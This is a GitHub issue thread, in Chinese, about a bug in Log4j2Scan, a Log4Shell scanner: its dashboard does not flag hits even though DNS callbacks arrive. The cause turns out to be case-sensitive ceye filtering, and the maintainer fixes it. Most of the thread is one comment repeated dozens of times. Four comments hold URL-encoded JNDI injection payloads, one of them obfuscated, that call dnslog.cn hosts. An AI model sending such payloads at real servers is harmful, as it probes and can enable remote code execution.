### ISSUE TITLE
感觉哪儿有问题啊，dashboard跟target那里都不变红

### ISSUE THREAD

**Issue by m82a3** [whwlsfb/Log4j2Scan#18]
dnslogcn跟自己编译的ceye测试都能有请求，但是dashboard这里不提示有漏洞。

**Comment by TheCryingGame** [comment]
同感
![image](https://user-images.githubusercontent.com/48227194/145748070-70f66842-129b-4005-a5bb-5d19741e00fc.png)
![image](https://user-images.githubusercontent.com/48227194/145748084-8586e9c5-f15d-40e5-bfdc-0b0336c7443b.png)

**Comment by whwlsfb** [comment]
> 同感 ![image](https://user-images.githubusercontent.com/48227194/145748070-70f66842-129b-4005-a5bb-5d19741e00fc.png) ![image](https://user-images.githubusercontent.com/48227194/145748084-8586e9c5-f15d-40e5-bfdc-0b0336c7443b.png)

请提供测试环境

**Comment by 0xbinibini** [comment]
确实扫出来没报，用volfocus的靶场试了下
![image](https://user-images.githubusercontent.com/90396582/145752146-5f5661f8-a704-45a1-80d4-de1ce7b923f7.png)

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
$%7bjndi%3aldap%3a//1639370059934oyKHs.1yu1tg.dnslog.cn/ry%7d

**Comment by wule108** [comment]
$%7b$%7bXHC%3azUCIOg%3aJUYR%3aDOQ%3avBP%3a-j%7dn$%7bLoSFze%3aepzK%3abwfz%3akSGloV%3aJAT%3a-d%7di%3a$%7bfVRJp%3aInpq%3aheH%3azPpe%3a-l%7d$%7bCIKJ%3aaefPgd%3a-d%7d$%7bAdjv%3aCPvPt%3aooKcCN%3a-a%7d$%7bJRH%3axCGRdk%3a-p%7d%3a//1639370061886dfyiv.1yu1tg.dnslog.cn/HhK%7d

**Comment by wule108** [comment]
$%7bjndi%3aldap%3a//1639370063633EHytU.1yu1tg.dnslog.cn/+JeyQy%7d

**Comment by wule108** [comment]
$%7bjndi%3armi%3a//1639370065564fgWIf.1yu1tg.dnslog.cn%7d

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by wule108** [comment]
0.6版本还没这个问题，0.7只能显示一个存在漏洞的ip资产

**Comment by whwlsfb** [comment]
> 确实扫出来没报，用volfocus的靶场试了下 ![image](https://user-images.githubusercontent.com/90396582/145752146-5f5661f8-a704-45a1-80d4-de1ce7b923f7.png)

确认使用方法是否正确

![](https://user-images.githubusercontent.com/8212964/145753232-591c7ae8-c5ce-4154-b386-e23712bb48bc.png)

**Comment by whwlsfb** [comment]
> dnslogcn跟自己编译的ceye测试都能有请求，但是dashboard这里不提示有漏洞。

请提供靶机环境，或确认是否是否为延迟造成的影响

**Comment by r1ghrfhd** [comment]
ceye 大小写敏感  Response resp = client.newCall(HttpUtils.GetDefaultRequest(platformUrl + "v1/records?token=" + token + "&type=dns&filter=" + domain.substring(0, domain. 这里全部小写 所以返回data都是[]

**Comment by whwlsfb** [comment]
> ceye 大小写敏感 Response resp = client.newCall(HttpUtils.GetDefaultRequest(platformUrl + "v1/records?token=" + token + "&type=dns&filter=" + domain.substring(0, domain. 这里全部小写 所以返回data都是[]

问题已修正

**Comment by freeAhao** [comment]
对所有参数url编码了，导致vulfocus靶场扫描不到漏洞。

**Comment by whwlsfb** [comment]
可以扫到，可以看下上面的图片
